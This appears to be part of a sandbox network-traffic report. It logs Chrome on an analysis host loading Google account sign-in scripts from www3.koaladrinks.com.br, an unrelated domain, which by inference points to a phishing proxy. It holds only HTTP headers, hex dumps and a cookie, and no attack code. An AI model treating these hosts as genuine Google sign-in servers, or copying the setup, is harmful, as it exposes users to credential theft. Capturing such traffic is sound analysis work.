                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:48 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:48 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:48 UTC12INData Raw: 41 67 65 3a 20 32 32 39 33 30 0d 0a
                                                      Data Ascii: Age: 22930
                                                      2025-01-10 08:27:48 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:48 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:48 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:48 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:48 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:48 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:48 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 33 38 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:38 GMT
                                                      2025-01-10 08:27:48 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 33 38 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:38 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.949762139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:47 UTC1487OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=LEikZe,_b,_tp,byfTOb,lsjVmc/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=n73qwf,SCuOPb,IZT63,vfuNJf,UUJqVe,ws9Tlc,siKnQd,cciGGe,m9oV,vjKJJ,y5vRwf,L9OGUe,PrPYRd,MpJwZc,cYShmd,hc6Ubd,Rkm0ef,KUM7Z,WpP9Yc,lwddkf,SpsfSb,aC1iue,EFQ78c,xQtZb,zbML3c,zr1jrb,vHEMJe,YHI3We, [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:48 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:48 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:48 UTC12INData Raw: 41 67 65 3a 20 32 32 39 32 39 0d 0a
                                                      Data Ascii: Age: 22929
                                                      2025-01-10 08:27:48 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:48 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:48 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:48 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:48 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:48 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:48 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 33 38 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:38 GMT
                                                      2025-01-10 08:27:48 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 33 38 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:38 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.949764139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:47 UTC2310OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NwH0H,OTA3Ae,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NL [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:48 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:48 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:48 UTC12INData Raw: 41 67 65 3a 20 32 32 39 33 30 0d 0a
                                                      Data Ascii: Age: 22930
                                                      2025-01-10 08:27:48 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:48 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:48 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:48 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:48 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:48 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:48 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 33 38 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:38 GMT
                                                      2025-01-10 08:27:48 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 33 38 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:38 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.949765139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:48 UTC1655OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,b3kMqb,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,lwddkf,m9oV,mvkUhe,n73qwf,pxq3x,qmdT9,siKnQd,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAu [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:48 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:48 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:48 UTC12INData Raw: 41 67 65 3a 20 36 39 30 33 34 0d 0a
                                                      Data Ascii: Age: 69034
                                                      2025-01-10 08:27:48 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:48 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:48 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:48 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:48 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:48 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:48 UTC37INData Raw: 44 61 74 65 3a 20 54 68 75 2c 20 30 39 20 4a 61 6e 20 32 30 32 35 20 31 33 3a 31 37 3a 31 34 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Thu, 09 Jan 2025 13:17:14 GMT
                                                      2025-01-10 08:27:48 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 46 72 69 2c 20 30 39 20 4a 61 6e 20 32 30 32 36 20 31 33 3a 31 37 3a 31 34 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Fri, 09 Jan 2026 13:17:14 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.949766139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:49 UTC2324OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;N [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:49 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:49 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:49 UTC12INData Raw: 41 67 65 3a 20 32 32 39 33 30 0d 0a
                                                      Data Ascii: Age: 22930
                                                      2025-01-10 08:27:49 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:49 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:49 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:49 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:49 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:49 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:49 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 33 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:39 GMT
                                                      2025-01-10 08:27:49 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 33 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:39 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.949767139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
